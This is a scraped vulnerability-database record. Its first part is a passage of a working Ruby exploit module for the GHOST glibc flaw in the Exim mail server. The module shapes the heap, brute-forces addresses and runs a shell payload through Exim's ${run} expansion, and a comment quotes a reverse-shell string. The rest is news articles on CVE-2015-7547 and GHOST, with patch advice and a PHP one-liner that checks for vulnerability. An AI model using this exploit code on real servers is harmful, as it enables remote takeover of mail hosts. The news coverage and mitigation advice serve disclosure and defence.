ensure\r\n smtp_disconnect\r\n end\r\n \r\n def code_execution\r\n print_status(\"Trying code execution...\")\r\n \r\n # can't \"${run{/bin/sh -c 'exec /bin/sh -i <&#{b} >&0 2>&0'}} \" anymore:\r\n # DW/26 Set FD_CLOEXEC on SMTP sockets after forking in the daemon, to ensure\r\n # that rogue child processes cannot use them.\r\n \r\n fail_with(\"codeexec\", \"encoded payload\") if payload.raw != payload.encoded\r\n fail_with(\"codeexec\", \"invalid payload\") if payload.raw.empty? or payload.raw.count(\"^\\x20-\\x7E\").nonzero?\r\n # Exim processes our run-ACL with expand_string() first (hence the [\\$\\{\\}\\\\] escapes),\r\n # and transport_set_up_command(), string_dequote() next (hence the [\\\"\\\\] escapes).\r\n encoded = payload.raw.gsub(/[\\\"\\\\]/, '\\\\\\\\\\\\&').gsub(/[\\$\\{\\}\\\\]/, '\\\\\\\\\\\\&')\r\n # setsid because of Exim's \"killpg(pid, SIGKILL);\" after \"alarm(60);\"\r\n command = '${run{/usr/bin/env setsid /bin/sh -c \"' + encoded + '\"}}'\r\n print_debug(command)\r\n \r\n # don't try to execute commands directly, try a very simple ACL first,\r\n # to distinguish between exploitation-problems and shellcode-problems\r\n \r\n acldrop = \"drop message=\"\r\n message = rand_text_alpha(command.length - acldrop.length)\r\n acldrop += message\r\n \r\n max_rand_offset = (@leaked[:arch] == ARCH_X86 ? 32 : 64)\r\n max_heap_addr = @leaked[:addr]\r\n min_heap_addr = nil\r\n survived = nil\r\n \r\n # we later fill log_buffer and big_buffer with alpha chars,\r\n # which creates a safe-zone at the beginning of the heap,\r\n # where we can't possibly crash during our brute-force\r\n \r\n # 4, because 3 copies of sender_helo_name, and step_len;\r\n # start big, but refine little by little in case\r\n # we crash because we overwrite important data\r\n \r\n helo_len = (LOG_BUFFER_SIZE + BIG_BUFFER_SIZE) / 4\r\n loop do\r\n \r\n sender_helo_name = \"A\" * helo_len\r\n address = sprintf(\"[%s]:%d\", @sender[:hostaddr], 65535)\r\n \r\n # the 3 copies of sender_helo_name, allocated by\r\n # host_build_sender_fullhost() in POOL_PERM memory\r\n \r\n helo_ip_size = ALIGNMENT +\r\n sender_helo_name[+1..-2].length\r\n \r\n sender_fullhost_size = ALIGNMENT +\r\n sprintf(\"%s (%s) %s\", @sender[:hostname], sender_helo_name, address).length\r\n \r\n sender_rcvhost_size = ALIGNMENT + ((@sender[:ident] == nil) ?\r\n sprintf(\"%s (%s helo=%s)\", @sender[:hostname], address, sender_helo_name) :\r\n sprintf(\"%s\\n\\t(%s helo=%s ident=%s)\", @sender[:hostname], address, sender_helo_name, @sender[:ident])\r\n ).length\r\n \r\n # fit completely into the safe-zone\r\n step_len = (LOG_BUFFER_SIZE + BIG_BUFFER_SIZE) -\r\n (max_rand_offset + helo_ip_size + sender_fullhost_size + sender_rcvhost_size)\r\n loop do\r\n \r\n # inside smtp_cmd_buffer (we later fill smtp_cmd_buffer and smtp_data_buffer\r\n # with alpha chars, which creates another safe-zone at the end of the heap)\r\n heap_addr = max_heap_addr\r\n loop do\r\n \r\n # try harder the first time around: we obtain better\r\n # heap boundaries, and we usually hit our ACL faster\r\n \r\n (min_heap_addr ? 1 : 2).times do\r\n \r\n # try the same heap_addr several times, but with different random offsets,\r\n # in case we crash because our hijacked storeblock's length field is too small\r\n # (we don't control what's stored at heap_addr)\r\n \r\n rand_offset = rand(max_rand_offset)\r\n print_debug(\"#{{ helo: helo_len, step: step_len, addr: heap_addr.to_s(16), offset: rand_offset }}\")\r\n reply = try_code_execution(helo_len, acldrop, heap_addr + rand_offset)\r\n print_debug(\"#{{ reply: reply }}\") if reply\r\n \r\n if reply and\r\n reply[:code] == \"550\" and\r\n # detect the parsed ACL, not the \"still in text form\" ACL (with \"=\")\r\n reply[:lines].join(\"\").delete(\"^=A-Za-z\") =~ /(\\A|[^=])#{message}/mn\r\n print_good(\"Brute-force SUCCESS\")\r\n print_good(\"Please wait for reply...\")\r\n # execute command this time, not acldrop\r\n reply = try_code_execution(helo_len, command, heap_addr + rand_offset)\r\n print_debug(\"#{{ reply: reply }}\")\r\n return handler\r\n end\r\n \r\n if not min_heap_addr\r\n if reply\r\n fail_with(\"codeexec\", \"no min_heap_addr\") if (max_heap_addr - heap_addr) >= MAX_HEAP_SIZE\r\n survived = heap_addr\r\n else\r\n if ((survived ? survived : max_heap_addr) - heap_addr) >= MIN_HEAP_SIZE\r\n # survived should point to our safe-zone at the beginning of the heap\r\n fail_with(\"codeexec\", \"never survived\") if not survived\r\n print_good \"Brute-forced min_heap_addr: #{survived.to_s(16)}\"\r\n min_heap_addr = survived\r\n end\r\n end\r\n end\r\n end\r\n \r\n heap_addr -= step_len\r\n break if min_heap_addr and heap_addr < min_heap_addr\r\n end\r\n \r\n break if step_len < 1024\r\n step_len /= 2\r\n end\r\n \r\n helo_len /= 2\r\n break if helo_len < 1024\r\n # ^ otherwise the 3 copies of sender_helo_name will\r\n # fit into the current_block of POOL_PERM memory\r\n end\r\n fail_with(\"codeexec\", \"Brute-force FAILURE\")\r\n end\r\n \r\n # our write-what-where primitive\r\n def try_code_execution(len, what, where)\r\n fail_with(\"codeexec\", \"#{what.length} >= #{len}\") if what.length >= len\r\n fail_with(\"codeexec\", \"#{where} < 0\") if where < 0\r\n \r\n x86 = (@leaked[:arch] == ARCH_X86)\r\n min_heap_shift = (x86 ? 512 : 768) # at least request2size(sizeof(FILE))\r\n heap_shift = min_heap_shift + rand(1024 - min_heap_shift)\r\n last_digit = 1 + rand(9)\r\n \r\n smtp_connect\r\n \r\n # fill smtp_cmd_buffer, smtp_data_buffer, and big_buffer with alpha chars\r\n smtp_send(\"MAIL FROM:\", \"\", method(:rand_text_alpha), \"<#{rand_text_alpha_upper(8)}>\", \"\", BIG_BUFFER_SIZE -\r\n \"501 : sender address must contain a domain\\r\\n\\0\".length)\r\n smtp_recv(501, 'sender address must contain a domain')\r\n \r\n smtp_send(\"RSET\")\r\n smtp_recv(250)\r\n \r\n # bulletproof Heap Feng Shui; the hard part is avoiding:\r\n # \"Too many syntax or protocol errors\" (3)\r\n # \"Too many unrecognized commands\" (3)\r\n # \"Too many nonmail commands\" (10)\r\n \r\n # / 5, because \"\\x7F\" is non-print, and:\r\n # ss = store_get(length + nonprintcount * 4 + 1);\r\n smtp_send(\"BAD1 \", \"\", \"\\x7F\", \"\", \"\", (19*1024 + heap_shift) / 5)\r\n smtp_recv(500, '\\A500 unrecognized command\\r\\n\\z')\r\n \r\n smtp_send(\"HELO \", \"\", \"0\", @sender[:hostaddr8], \"\", 5*1024+13-1)\r\n smtp_recv(250)\r\n \r\n smtp_send(\"HELO \", \"\", \"0\", @sender[:hostaddr8], \"\", 3*1024+13-1)\r\n smtp_recv(250)\r\n \r\n smtp_send(\"BAD2 \", \"\", \"\\x7F\", \"\", \"\", (13*1024 + 128) / 5)\r\n smtp_recv(500, '\\A500 unrecognized command\\r\\n\\z')\r\n \r\n smtp_send(\"HELO \", \"\", \"0\", @sender[:hostaddr8], \"\", 3*1024+16+13-1)\r\n smtp_recv(250)\r\n \r\n # overflow (3 bytes) gethostbyname's buffer, and\r\n # overwrite its next_chunk's size field with 0x003?31\r\n # ^ last_digit\r\n smtp_send(\"EHLO \", \"\", \"0\", \".1#{last_digit}\", \"\", 5*1024+64+3-1)\r\n smtp_recv(HELO_CODES) # ^ 0x30 | PREV_INUSE\r\n \r\n # auth_xtextdecode() is the only way to overwrite the beginning of a\r\n # current_block of memory (the \"storeblock\" structure) with arbitrary data\r\n # (so that our hijacked \"next\" pointer can contain NUL, CR, LF characters).\r\n # this shapes the rest of our exploit: we overwrite the beginning of the\r\n # current_block of POOL_PERM memory with the current_block of POOL_MAIN\r\n # memory (allocated by auth_xtextdecode()).\r\n \r\n auth_prefix = rand_text_alpha(x86 ? 11264 : 11280)\r\n (x86 ? 4 : 8).times { |i| auth_prefix += sprintf(\"+%02x\", (where >> (i*8)) & 255) }\r\n auth_prefix += \".\"\r\n \r\n # also fill log_buffer with alpha chars\r\n smtp_send(\"MAIL FROM:<> AUTH=\", auth_prefix, method(:rand_text_alpha), \"+\", \"\", 0x3030)\r\n smtp_recv(501, 'invalid data for AUTH')\r\n \r\n smtp_send(\"HELO \", \"[1:2:3:4:5:6:7:8%eth0:\", \" \", \"#{what}]\", \"\", len)\r\n begin\r\n reply = smtp_recv(ANY_CODE)\r\n return reply if reply[:code] !~ /#{HELO_CODES}/\r\n return reply if reply[:code] != \"250\" and reply[:lines].first !~ /argument does not match calling host/\r\n \r\n smtp_send(\"MAIL FROM:<>\")\r\n reply = smtp_recv(ANY_CODE)\r\n return reply if reply[:code] != \"250\"\r\n \r\n smtp_send(\"RCPT TO:<postmaster>\")\r\n reply = smtp_recv\r\n return reply\r\n \r\n rescue\r\n return nil\r\n end\r\n \r\n ensure\r\n smtp_disconnect\r\n end\r\n \r\n DIGITS = '([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])'\r\n DOT = '[.]'\r\n \r\n def smtp_connect(exploiting = true)\r\n fail_with(\"smtp_connect\", \"sock isn't nil\") if sock\r\n \r\n connect\r\n fail_with(\"smtp_connect\", \"sock is nil\") if not sock\r\n @smtp_state = :recv\r\n \r\n banner = smtp_recv(220)\r\n return if not exploiting\r\n \r\n sender_host_address = datastore['SENDER_HOST_ADDRESS']\r\n if sender_host_address !~ /\\A#{DIGITS}#{DOT}#{DIGITS}#{DOT}#{DIGITS}#{DOT}#{DIGITS}\\z/\r\n fail_with(\"smtp_connect\", \"bad SENDER_HOST_ADDRESS (nil)\") if sender_host_address.nil?\r\n fail_with(\"smtp_connect\", \"bad SENDER_HOST_ADDRESS (not in IPv4 dotted-decimal notation)\")\r\n end\r\n sender_host_address_octal = \"0\" + $1.to_i.to_s(8) + \".#{$2}.#{$3}.#{$4}\"\r\n \r\n # turn helo_seen on (enable the MAIL command)\r\n # call smtp_verify_helo() (force fopen() and small malloc()s)\r\n # call host_find_byname() (force gethostbyname's initial 1024-byte malloc())\r\n smtp_send(\"HELO #{sender_host_address_octal}\")\r\n reply = smtp_recv(HELO_CODES)\r\n \r\n if reply[:code] != \"250\"\r\n fail_with(\"smtp_connect\", \"not Exim?\") if reply[:lines].first !~ /argument does not match calling host/\r\n fail_with(\"smtp_connect\", \"bad SENDER_HOST_ADDRESS (helo_verify_hosts)\")\r\n end\r\n \r\n if reply[:lines].first =~ /\\A250 (\\S*) Hello (.*) \\[(\\S*)\\]\\r\\n\\z/mn\r\n fail_with(\"smtp_connect\", \"bad SENDER_HOST_ADDRESS (helo_try_verify_hosts)\") if sender_host_address != $3\r\n smtp_active_hostname = $1\r\n sender_host_name = $2\r\n \r\n if sender_host_name =~ /\\A(.*) at (\\S*)\\z/mn\r\n sender_host_name = $2\r\n sender_ident = $1\r\n else\r\n sender_ident = nil\r\n end\r\n fail_with(\"smtp_connect\", \"bad SENDER_HOST_ADDRESS (no FCrDNS)\") if sender_host_name == sender_host_address_octal\r\n \r\n else\r\n # can't double-check sender_host_address here, so only for advanced users\r\n fail_with(\"smtp_connect\", \"user-supplied EHLO greeting\") unless datastore['I_KNOW_WHAT_I_AM_DOING']\r\n # worst-case scenario\r\n smtp_active_hostname = \"A\" * NS_MAXDNAME\r\n sender_host_name = \"A\" * NS_MAXDNAME\r\n sender_ident = \"A\" * 127 * 4 # sender_ident = string_printing(string_copyn(p, 127));\r\n end\r\n \r\n _sender = @sender\r\n @sender = {\r\n hostaddr: sender_host_address,\r\n hostaddr8: sender_host_address_octal,\r\n hostname: sender_host_name,\r\n ident: sender_ident,\r\n __smtp_active_hostname: smtp_active_hostname\r\n }\r\n fail_with(\"smtp_connect\", \"sender changed\") if _sender and _sender != @sender\r\n \r\n # avoid a future pathological case by forcing it now:\r\n # \"Do NOT free the first successor, if our current block has less than 256 bytes left.\"\r\n smtp_send(\"MAIL FROM:\", \"<\", method(:rand_text_alpha), \">\", \"\", STOREPOOL_MIN_SIZE + 16)\r\n smtp_recv(501, 'sender address must contain a domain')\r\n \r\n smtp_send(\"RSET\")\r\n smtp_recv(250, 'Reset OK')\r\n end\r\n \r\n def smtp_send(prefix, arg_prefix = nil, arg_pattern = nil, arg_suffix = nil, suffix = nil, arg_length = nil)\r\n fail_with(\"smtp_send\", \"state is #{@smtp_state}\") if @smtp_state != :send\r\n @smtp_state = :sending\r\n \r\n if not arg_pattern\r\n fail_with(\"smtp_send\", \"prefix is nil\") if not prefix\r\n fail_with(\"smtp_send\", \"param isn't nil\") if arg_prefix or arg_suffix or suffix or arg_length\r\n command = prefix\r\n \r\n else\r\n fail_with(\"smtp_send\", \"param is nil\") unless prefix and arg_prefix and arg_suffix and suffix and arg_length\r\n length = arg_length - arg_prefix.length - arg_suffix.length\r\n fail_with(\"smtp_send\", \"len is #{length}\") if length <= 0\r\n argument = arg_prefix\r\n case arg_pattern\r\n when String\r\n argument += arg_pattern * (length / arg_pattern.length)\r\n argument += arg_pattern[0, length % arg_pattern.length]\r\n when Method\r\n argument += arg_pattern.call(length)\r\n end\r\n argument += arg_suffix\r\n fail_with(\"smtp_send\", \"arglen is #{argument.length}, not #{arg_length}\") if argument.length != arg_length\r\n command = prefix + argument + suffix\r\n end\r\n \r\n fail_with(\"smtp_send\", \"invalid char in cmd\") if command.count(\"^\\x20-\\x7F\") > 0\r\n fail_with(\"smtp_send\", \"cmdlen is #{command.length}\") if command.length > SMTP_CMD_BUFFER_SIZE\r\n command += \"\\n\" # RFC says CRLF, but squeeze as many chars as possible in smtp_cmd_buffer\r\n \r\n # the following loop works around a bug in the put() method:\r\n # \"while (send_idx < send_len)\" should be \"while (send_idx < buf.length)\"\r\n # (or send_idx and/or send_len could be removed altogether, like here)\r\n \r\n while command and not command.empty?\r\n num_sent = sock.put(command)\r\n fail_with(\"smtp_send\", \"sent is #{num_sent}\") if num_sent <= 0\r\n fail_with(\"smtp_send\", \"sent is #{num_sent}, greater than #{command.length}\") if num_sent > command.length\r\n command = command[num_sent..-1]\r\n end\r\n \r\n @smtp_state = :recv\r\n end\r\n \r\n def smtp_recv(expected_code = nil, expected_data = nil)\r\n fail_with(\"smtp_recv\", \"state is #{@smtp_state}\") if @smtp_state != :recv\r\n @smtp_state = :recving\r\n \r\n failure = catch(:failure) do\r\n \r\n # parse SMTP replies very carefully (the information\r\n # leak injects arbitrary data into multiline replies)\r\n \r\n data = \"\"\r\n while data !~ /(\\A|\\r\\n)[0-9]{3}[ ].*\\r\\n\\z/mn\r\n begin\r\n more_data = sock.get_once\r\n rescue\r\n throw(:failure, \"Caught #{$!.class}: #{$!.message}\")\r\n end\r\n throw(:failure, \"no more data\") if more_data.nil?\r\n throw(:failure, \"no more data\") if more_data.empty?\r\n data += more_data\r\n end\r\n \r\n throw(:failure, \"malformed reply (count)\") if data.count(\"\\0\") > 0\r\n lines = data.scan(/(?:\\A|\\r\\n)[0-9]{3}[ -].*?(?=\\r\\n(?=[0-9]{3}[ -]|\\z))/mn)\r\n throw(:failure, \"malformed reply (empty)\") if lines.empty?\r\n \r\n code = nil\r\n lines.size.times do |i|\r\n lines[i].sub!(/\\A\\r\\n/mn, \"\")\r\n lines[i] += \"\\r\\n\"\r\n \r\n if i == 0\r\n code = lines[i][0,3]\r\n throw(:failure, \"bad code\") if code !~ /\\A[0-9]{3}\\z/mn\r\n if expected_code and code !~ /\\A(#{expected_code})\\z/mn\r\n throw(:failure, \"unexpected #{code}, expected #{expected_code}\")\r\n end\r\n end\r\n \r\n line_begins_with = lines[i][0,4]\r\n line_should_begin_with = code + (i == lines.size-1 ? \" \" : \"-\")\r\n \r\n if line_begins_with != line_should_begin_with\r\n throw(:failure, \"line begins with #{line_begins_with}, \" \\\r\n \"should begin with #{line_should_begin_with}\")\r\n end\r\n end\r\n \r\n throw(:failure, \"malformed reply (join)\") if lines.join(\"\") != data\r\n if expected_data and data !~ /#{expected_data}/mn\r\n throw(:failure, \"unexpected data\")\r\n end\r\n \r\n reply = { code: code, lines: lines }\r\n @smtp_state = :send\r\n return reply\r\n end\r\n \r\n fail_with(\"smtp_recv\", \"#{failure}\") if expected_code\r\n return nil\r\n end\r\n \r\n def smtp_disconnect\r\n disconnect if sock\r\n fail_with(\"smtp_disconnect\", \"sock isn't nil\") if sock\r\n @smtp_state = :disconnected\r\n end\r\nend\n\n# 0day.today [2018-01-10] #", "sourceHref": "https://0day.today/exploit/23392", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "thn": [{"lastseen": "2018-01-27T10:06:54", "description": "[](<https://3.bp.blogspot.com/-_4EpHCqniVA/VsQtYB5WSwI/AAAAAAAAmuc/xFGkZE8C85Q/s1600/glibc-linux-flaw.png>)\n\nA highly critical vulnerability has been uncovered in the **GNU C Library (glibc)**, a key component of most Linux distributions, that leaves nearly all Linux machines, thousands of apps and electronic devices vulnerable to hackers that can take full control over them.\n\n \n\n\nJust clicking on a link or connecting to a server can result in remote code execution (RCE), allowing hackers to steal credentials, spy on users, seize control of computers, and many more.\n\n \n\n\nThe vulnerability is similar to the last year's [GHOST vulnerability](<https://thehackernews.com/2015/01/ghost-linux-security-vulnerability27.html>) (CVE-2015-0235) that left countless machines vulnerable to_ remote code execution (RCE) attacks_, representing a major Internet threat.\n\n \n\n\nGNU C Library (glibc) is a collection of open source code that powers thousands of standalone apps and most Linux distributions, including those distributed to routers and other types of hardware.\n\n \n\n\nThe recent flaw, which is indexed as _CVE-2015-7547_, is a **stack-based buffer overflow** vulnerability in glibc's DNS client-side resolver that is used to translate human-readable domain names, like google.com, into a network IP address.\n\n \n\n\nThe buffer overflow flaw is triggered when the _getaddrinfo() library function_ that performs domain-name lookups is in use, allowing hackers to remotely execute malicious code.\n\n \n\n\n### How Does the Flaw Work?\n\n \n\n\nThe flaw can be exploited when an affected device or app make queries to a malicious DNS server that returns too much information to a lookup request and floods the program's memory with code.\n\n \n\n\nThis code then compromises the vulnerable application or device and tries to take over the control over the whole system.\n\n \n\n\nIt is possible to inject the domain name into server log files, which when resolved will trigger remote code execution. An SSH (Secure Shell) client connecting to a server could also be compromised.\n\n \n\n\nHowever, an attacker need to bypass several operating system security mechanisms \u2013 _like ASLR and non-executable stack protection _\u2013 in order to achieve successful RCE attack.\n\n \n\n\nAlternatively, an attacker on your network could perform **man-in-the-middle **(MitM) attacks and tamper with DNS replies in a view to monitoring and manipulating (injecting payloads of malicious code) data flowing between a vulnerable device and the Internet.\n\n \n\n\n### Affected Software and Devices\n\n \n\n\nAll versions of glibc after 2.9 are vulnerable. Therefore, any software or application that connects to things on a network or the Internet and uses glibc is at RISK.\n\n \n\n\nThe widely used SSH, sudo, and curl utilities are all known to be affected by the buffer overflow bug, and security researchers warn that the list of other affected applications or code is almost too diverse and numerous to enumerate completely.\n\n \n\n\nThe vulnerability could extend to a nearly all the major software, including:\n\n * Virtually all distributions of Linux.\n * Programming languages such as the Python, PHP, and Ruby on Rails.\n * Many others that use Linux code to lookup the numerical IP address of an Internet domain.\n * Most Bitcoin software is [reportedly vulnerable](<https://thehackernews.com/2015/01/ghost-linux-security-vulnerability27.html>), too.\n\n \n\n\n### Who are Not Affected\n\n \n\n\nThe good news is users of Google's Android mobile operating system aren't vulnerable to this flaw. As the company uses a glibc substitute known as Bionic that is not susceptible, according to a Google representative.\n\n \n\n\nAdditionally, a lot of embedded Linux devices, including home routers and various gadgets, are not affected by the bug because these devices use the **uclibc** library as it is more lightweight than hefty glibc.\n\n \n\n\nThe vulnerability was first introduced in May 2008 but was [reported](<https://sourceware.org/bugzilla/show_bug.cgi?id=18665>) to the glibc maintainers July 2015.\n\n \n\n\nThe vulnerability was discovered independently by researchers at **Google** and **Red Hat**, who found that the vulnerability has likely not been publicly attacked.\n\n \n\n\nThe flaw was discovered when one of the Google's SSH apps experienced a severe error called a segmentation fault each time it attempted to contact to a particular Internet address, Google's security team reported in a [blog post](<https://googleonlinesecurity.blogspot.ca/2016/02/cve-2015-7547-glibc-getaddrinfo-stack.html>) published Monday.\n\n \n\n\n### Where glibc went Wrong\n\n \n\n\nGoogle researchers figured out that the error was due to a buffer overflow bug inside the glibc library that made malicious code execution attacks possible. The researchers then notified glibc maintainers.\n\n \n\n\nHere's what went wrong, according to the Google engineers:\n\n \n\n\n> \"glibc reserves 2048 bytes in the stack through alloca() for the DNS answer at _nss_dns_gethostbyname4_r() for hosting responses to a DNS query. Later on, at send_dg() and send_vc(), if the response is larger than 2048 bytes, a new buffer is allocated from the heap and all the information (buffer pointer, new buffer size and response size) is updated.\" \n \n\"Under certain conditions a mismatch between the stack buffer and the new heap allocation will happen. The final effect is that the stack buffer will be used to store the DNS response, even though the response is larger than the stack buffer and a heap buffer was allocated. This behavior leads to the stack buffer overflow.\"\n\n \n\n\n#### _Proof-of-Concept Exploit Released_\n\nGoogle bod Fermin J. Serna released a [Proof-of-Concept](<https://github.com/fjserna/CVE-2015-7547>) (POC) exploit code on Tuesday.\n\n \n\n\nWith this POC code, you can verify if you are affected by this critical issue, and verify any mitigations you may wish to enact.\n\n \n\n\n### Patch glibc Vulnerability\n\n \n\n\nGoogle researchers, working with security researchers at Red Hat, have [released a patch](<https://sourceware.org/ml/libc-alpha/2016-02/msg00416.html>) to fix the programming blunder.\n\n \n\n\nHowever, it is now up to the community behind the Linux OS and manufacturers, to roll out the patch to their affected software and devices as soon as possible.\n\n \n\n\nFor people running servers, fixing the issue will be a simple process of downloading and installing the patch update.\n\n \n\n\nBut for other users, patching the problem may **not be so easy**. The apps compiled with a vulnerable glibc version should be recompiled with an updated version \u2013 a process that will take time as users of affected apps have to wait for updates to become available from developers.\n\n \n\n\nMeanwhile, you can help prevent exploitation of the flaw, if you aren\u2019t able to immediately patch your instance of glibc, by limiting all TCP DNS replies to 1024 bytes, and dropping UDP DNS packets larger than 512 bytes.\n\n \n\n\nFor more in-depth information on the glibc flaw, you can read Red Hat [blog post](<https://access.redhat.com/errata/RHSA-2016:0175>).\n", "cvss3": {}, "published": "2016-02-16T21:27:00", "type": "thn", "title": "Critical glibc Flaw Puts Linux Machines and Apps at Risk (Patch Immediately)", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2015-0235", "CVE-2015-7547"], "modified": "2016-02-17T08:27:51", "id": "THN:ACBFC80659E47A5B7C81B99570749679", "href": "https://thehackernews.com/2016/02/glibc-linux-flaw.html", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-01-27T09:17:34", "description": "[](<https://4.bp.blogspot.com/-n9qRyLyEnTk/VMhH-B1pR3I/AAAAAAAAhoo/hhqRYQ4ynzs/s728/ghost-linux-security-vulnerability.png>)\n\nA highly critical vulnerability has been unearthed in the **GNU C Library (glibc)**, a widely used component of most Linux distributions, that could allow attackers to execute malicious code on servers and remotely gain control of Linux machines.\n\n \n\n\nThe vulnerability, dubbed \"**GHOST**\" and assigned _[CVE-2015-0235](<http://seclists.org/oss-sec/2015/q1/283>)_, was discovered and disclosed by the security researchers from Redwood Shores, California-based security firm Qualys on Tuesday.\n\n \n\n\n**CRITICAL AS HEARTBLEED AND SHELLSHOCK**\n\nGHOST is considered to be critical because hackers could exploit it to silently gain complete control of a targeted Linux system without having any prior knowledge of system credentials (i.e. administrative passwords). \n \n**Also Read: **[Top Best Password Managers](<https://thehackernews.com/2016/07/best-password-manager.html>).\n\n \n\n\nThe flaw represents an immense Internet threat, in some ways similar to the **[Heartbleed](<https://thehackernews.com/2014/04/heartbleed-bug-explained-10-most.html>),** **[Shellshock](<https://thehackernews.com/2014/09/Shellshock-Bash-Vulnerability-exploit.html>) **and** [Poodle](<https://thehackernews.com/2014/10/poodle-ssl-30-attack-exploits-widely_14.html>) **bugs that came to light last year.\n\n \n\n\n**WHY GHOST ?**\n\nThe vulnerability in the GNU C Library (glibc) is dubbed GHOST because it can be triggered by the library's _gethostbyname family of functions_. Glibc is a repository of open-source software written in the C and C++ coding languages that defines system calls.\n\n \n\n\nThe problem actual originates from a heap-based buffer overflow found in the **___nss_hostname_digits_dots()_** function in glibc. This function is especially invoked by the **_gethostbyname **and** gethostbyname2() **function calls.\n\n \n\n\nAccording to the researchers, a remote attacker has ability to call either of these functions which could allow them to exploit the vulnerability in an effort to execute arbitrary code with the permissions of the user running the application.\n\n \n\n\n**EXPLOIT CODE**\n\nIn an attempt to highlight the severity of the risk, security researchers were able to write proof-of-concept exploit code that is capable to carry out a full-fledged remote code execution attack against the [Exim mail server](<http://exim.org/>). \n \n**Also Read:** [Deep Web Search Engines](<https://thehackernews.com/2016/02/deep-web-search-engine.html>).\n\n \n\n\nThe researcher\u2019s exploit able to bypass all existing exploit protections (like ASLR, PIE and NX) available on both 32-bit and 64-bit systems, including position independent executions, address space layout randomization and no execute protections.\n\n \n\n\nUsing the exploit, an attacker is able to craft malicious emails that could automatically compromise a vulnerable server without the email even being opened, according to Amol Sarwate, director of engineering with Qualys.\n\n \n\n\nSo far, the company has not published the exploit code to the public but eventually it plans to make the exploit available as a Metasploit module.\n\n \n\n\n**VERSIONS AFFECTED**\n\nThe vulnerability affects versions of glibc as far back as glibc-2.2, which was released in 2000.\n\n> \"Unfortunately, it was not recognized as a security threat; as a result, most stable and long-term-support distributions were left exposed (and still are): Debian 7 (wheezy), Red Hat Enterprise Linux 6 &amp; 7, CentOS 6 &amp; 7, Ubuntu 12.04, for example,\" researchers from Qualys said in an [advisory](<http://www.openwall.com/lists/oss-security/2015/01/27/9>) published Tuesday.\n\n**FIXES AVAILABLE FOR SOME LINUX DISTRIBUTIONS**\n\nHowever, major distributors of the Linux operating system, including **[Red Hat](<https://rhn.redhat.com/errata/RHSA-2015-0090.html>)**, **[Debian](<https://security-tracker.debian.org/tracker/CVE-2015-0235>)** and **[Ubuntu](<https://launchpad.net/ubuntu/+source/eglibc>)**, updated their software on Tuesday to thwart the serious cyber threat. In order to update systems, core functions or the entire affected server reboot is required.\n\n \n\n\nRed Hat, the No. 1 provider of Linux software to businesses, recommends its customers to update their systems _\"as soon as possible to mitigate any potential risk.\"_\n", "cvss3": {}, "published": "2015-01-27T21:17:00", "type": "thn", "title": "Critical GHOST vulnerability affects most Linux Systems", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2015-0235"], "modified": "2016-08-04T08:10:47", "id": "THN:A649F4ABCE9B99052139693A13D95B14", "href": "https://thehackernews.com/2015/01/ghost-linux-security-vulnerability27.html", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-01-27T09:17:33", "description": "[](<https://3.bp.blogspot.com/-4Dia-n2xwzc/VMtiJcqIwVI/AAAAAAAAhqc/bAafPBMQ_gw/s1600/ghost-glibc-vulnerabilitywordPress.jpg>)\n\nAfter the disclosure of extremely critical **[GHOST vulnerability](<https://thehackernews.com/2015/01/ghost-linux-security-vulnerability27.html>) in the GNU C library (glibc)** \u2014 a widely used component of most Linux distributions, security researchers have discovered that PHP applications, including the _**[WordPress](<https://thehackernews.com/search/label/WordPress>) **_Content Management System (CMS), could also be affected by the bug.\n\n \n\n\n\"**GHOST**\" is a serious vulnerability (_CVE-2015-0235_), announced this week by the researchers of California-based security firm Qualys, that involves a heap-based buffer overflow in the glibc function name - \"GetHOSTbyname().\" Researchers said the vulnerability has been present in the glibc code since 2000.\n\n \n\n\nThough the major Linux distributors such as **Red Hat**, **Debian** and** Ubuntu**, have already updated their software against the flaw, GHOST could be used by hackers against only a handful of applications currently to remotely run executable code and silently gain control of a Linux server. \n\n \n\n\nAs we explained in our previous article, heap-based buffer overflow was found in ___nss_hostname_digits_dots()_ function, which is particularly used by the **gethostbyname()** and **gethostbyname2()** glibc function call. \n\n \n\n\nSince, PHP applications including WordPress also use the **_gethostbyname() function wrapper_**, the chance of the critical vulnerability becomes higher even after many Linux distributions issued fixes.\n\n \n\n\n**GHOST - BIG ISSUE FOR WORDPRESS**\n\nAccording to the Sucuri researcher Marc-Alexandre Montpas, GHOST vulnerability could be a big issue for WordPress CMS, as it uses **wp_http_validate_url()** function to validate every pingback post URL.\n\n> \"._...And it does so by using gethostbyname(),_\" wrote Montpas in an [advisory](<http://blog.sucuri.net/2015/01/critical-ghost-vulnerability-released.html>) published Wednesday. \"_So an attacker could leverage this vector to insert a malicious URL that would trigger a buffer overflow bug, server-side, potentially allowing him to gain privileges on the server._\"\n\nThe vulnerability affects all versions of glibc from glibc-2.17 and lower. However, it was patched in glibc-2.18 in May 2013, but was not marked as a security vulnerability so the fix did not make it into many common Linux distributions like RedHat and Ubuntu.\n\n \n\n\n**HOW TO CHECK YOUR SYSTEM AGAINST GHOST FLAW**\n\n> _\"This is a very critical vulnerability and should be treated as such,\"_ Montpas said._ \"If you have a dedicated server (or VPS) running Linux, you have to make sure you update it right away.\"_\n\nSucuri also provided the following test PHP code, which an admin can run on their server terminal. If the code returns a segmentation fault, then your Linux server is vulnerable to the GHOST vulnerability.\n\n> _php -r '$e=\"0\u2033;for($i=0;$i&lt;2500;$i++){$e=\"0$e\";} gethostbyname($e);' Segmentation fault_\n\n**HOW TO PROTECT**\n\nUntil now, Debian 7, Red Hat Enterprise Linux 6 and 7, CentOS 6 and 7 and Ubuntu 12.04 have released software updates. So users of above Linux distributions are recommended to patch their systems, followed by a system reboot, as soon as possible. \n\n * **Disable XML-RPC **\nIf you don\u2019t want to use XML-RPC process, it is possible to disable it altogether. There are even [Wordpress plugins](<https://wordpress.org/plugins/prevent-xmlrpc/>) that will totally disable XML-RPC process. \n\n\n * **Disable Pingback Requests **\nYou may also disable the pingback feature by adding the following code to your **functions.php file**: 